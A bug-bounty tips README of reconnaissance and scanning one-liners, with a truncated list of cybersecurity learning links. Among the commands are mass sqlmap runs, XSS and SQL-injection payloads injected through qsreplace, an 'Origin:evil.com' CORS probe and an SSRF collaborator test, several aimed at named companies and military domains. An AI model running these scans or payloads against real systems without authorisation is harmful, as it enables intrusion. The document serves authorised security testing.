[Axiom](https://github.com/pry0cc/axiom) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Haklistgen](https://github.com/hakluke/haklistgen) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/hiddengearz/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Notify](https://github.com/projectdiscovery/notify) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [GetJS](https://github.com/003random/getJS) - [X8](https://github.com/Sh1Yo/x8) - [Unfurl](https://github.com/tomnomnom/unfurl) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### .bashrc shortcut OFJAAAH ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Oneliner Haklistgen - @hakluke ```bash subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; ``` ### Running JavaScript on each page send to proxy. - [Explained command](https://bit.ly/3daIyFw) ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/3nnEhCj) ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/324Sr1x) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command](https://bit.ly/3w48wl8) ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command](https://bit.ly/339CN5p) ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command](https://bit.ly/3d0VcY5) ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command](https://bit.ly/3m5ft1g) ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command](https://bit.ly/3bvghsY) ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command](https://bit.ly/3eoUhSb) ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command](https://bit.ly/3kZydis) ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command](https://bit.ly/2NvXRyv) ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command](https://bit.ly/3aaEDHL) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command](https://bit.ly/3aMXQOF) ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command](https://bit.ly/3aKSSCb) ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command](https://bit.ly/2MKkOxm) ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null" ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
# Cybersecurity Resources ## Articles - [Pentesting with an Android phone](https://www.peerlyst.com/posts/pentesting-with-an-android-phone-part-1-preparing-the-phone-david-dunmore?trk=profile_page_overview_panel_posts) - [Creating a Trojan](https://github.com/1d8/trojan) ## Blogs - [Google Project Zero](https://googleprojectzero.blogspot.com/) - Zero day research from Google - [Phrack](https://phrack.org) ## Books - https://please.dont-hack.me/books/hacking/ - https://doc.lagout.org/ - [Hacking/Security eBooks](https://github.com/yeahhub/Hacking-Security-Ebooks) - [Free Security eBooks](https://github.com/Hack-with-Github/Free-Security-eBooks) ## Certificate - [Network+ Study Guide](https://docs.google.com/document/d/1iyFK7tvM5JVhRnNH6IWnZ07OGlHcxmEEVVv56Rccsng/edit) - [OSCP](https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/) - [Security+ Study Guide](https://docs.google.com/document/d/1hXGyKDWdpJLKZWWuu5eVTh-N5simhpSlTTA-Z-dtCj0/edit) ## Cheatsheets - [CIS Controls List](https://www.cisecurity.org/controls/cis-controls-list/) - [Must have cheatsheet, r/AskNetSec](https://www.reddit.com/r/AskNetsec/comments/98jqgb/what_are_some_must_have_cheatsheets/) - [Netcat Cheat Sheet](https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf) - [PenTesting tools cheatsheet](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/) - [Black Alps](https://www.blackalps.ch/ba-18/) - [OWASP Cheat Sheets](https://github.com/OWASP/CheatSheetSeries) ## HackerEarth - CTF - [Cipher Combat](https://ciphercombatforbeginners.hackerearth.com/) - [Cipher Combat-2.0](https://www.hackerearth.com/challenges/hackathon/cipher-combat-20/) - [Brute Force 1.0](https://www.hackerearth.com/challenges/hackathon/brute-force-10/) - [Cipher Combat - VAPT](https://www.hackerearth.com/challenges/competitive/Cipher-combat-3-VAPT) ## Learning - http://www.securitytube.net/ - http://cybrary.it/ - http://null-byte.wonderhowto.com/how-to/ - http://n0where.net/ - http://www.offensive-security.com/metasploit-unleashed - http://www.exploit-db.com/ - https://siph0n.net/ - http://www.cvedetails.com/ - http://resources.infosecinstitute.com/ - http://www.windowsecurity.com/articles-tutorials/ - http://www.securitysift.com/ - http://www.sans.org/reading-room/ - http://packetstormsecurity.com/files/ - https://www.corelan.be/index.php/articles/ - http://routerpwn.com/ - http://opensecuritytraining.info/Training.html - https://www.blackhat.com/html/archives.html - http://magazine.hitb.org/hitb-magazine.html - https://www.hacksplaining.com/lessons - http://securityidiots.com - https://blog.skullsecurity.org/ ## Lists - [Awesome CTF](https://github.com/apsdehal/awesome-ctf) - A curated list of CTF frameworks, libraries, resources and softwares - [Awesome Hacking](https://github.com/Hack-with-Github/Awesome-Hacking) - A collection of 